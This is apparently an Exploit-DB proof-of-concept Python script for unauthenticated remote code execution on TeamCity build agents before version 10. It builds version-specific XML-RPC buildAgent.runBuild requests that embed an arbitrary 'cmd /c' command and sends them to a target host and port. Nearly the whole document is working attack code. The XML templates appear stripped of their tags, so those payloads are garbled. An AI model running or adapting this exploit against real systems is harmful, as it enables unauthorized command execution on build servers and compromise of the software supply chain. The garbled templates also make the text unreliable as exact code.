# Exploit Title: TeamCity Agent XML-RPC 10.0 - Remote Code Execution # Date: 2020-03-20 # Exploit Author: Dylan Pindur # Vendor Homepage: https://www.jetbrains.com/teamcity/ # Version: TeamCity < 10.0 (42002) # Tested on: Windows 10 (x64) # References: # https://www.exploit-db.com/exploits/45917 # https://www.tenable.com/plugins/nessus/94675 # # TeamCity Agents configured to use bidirectional communication allow the execution # of commands sent to them via an XML-RPC endpoint. # # This script requires the following python modules are installed # pip install requests # #!/usr/local/bin/python3 import requests import sys # region tc7 teamcity_7_req = """ buildAgent.runBuild 123456 x ON_AGENT x system.build.number 0 simpleRunner x script.content {SCRIPT} teamcity.step.mode default use.custom.script true teamcity.build.step.name x 3 ]]> """.strip() # endregion # region tc8 teamcity_8_req = """ buildAgent.runBuild 123456 x ON_AGENT x system.build.number 0 x false simpleRunner x teamcity.build.step.name x script.content {SCRIPT} teamcity.step.mode default use.custom.script true 3 ]]> """.strip() # endregion # region tc9 teamcity_9_req = """ buildAgent.runBuild 123456 x x ON_AGENT x 3 system.build.number 0 x false simpleRunner x teamcity.build.step.name x script.content {SCRIPT} teamcity.step.mode default use.custom.script true ]]> """.strip() # endregion # region tc10 teamcity_10_req = """ buildAgent.runBuild 123456 x x ON_AGENT x 123456 x 3 system.build.number 0 x false simpleRunner x teamcity.build.step.name x script.content {SCRIPT} teamcity.step.mode default use.custom.script true ]]> """.strip() # endregion def prepare_payload(version, cmd): if version == 7: return teamcity_7_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) elif version == 8: return teamcity_8_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) elif version == 9: return teamcity_9_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) elif version == 10: return teamcity_10_req.replace("{SCRIPT}", "cmd /c {}".format(cmd)) else: raise Exception("No payload available for version {}".format(version)) def send_req(host, port, payload): headers = { "Content-Type": "text/xml" } url = "http://{}:{}/".format(host, port) r = requests.post(url, headers=headers, data=payload) if r.status_code == 200 and 'fault' not in r.text: print('Command sent successfully') else: print('Command failed') print(r.text) if len(sys.argv) != 4: print('[!] Missing arguments') print('[ ] Usage: {} '.format(sys.argv[0])) print("[ ] E.g. {} 192.168.1.128 9090 'whoami > C:\\x.txt'".format(sys.argv[0])) sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) cmd = sys.argv[3] version = input("Enter TeamCity version (7,8,9,10): ") version = int(version.strip()) if version not in [7, 8, 9, 10]: print("Please select a valid version (7,8,9,10)") sys.exit(1) payload = prepare_payload(version, cmd) send_req(target, str(port), payload)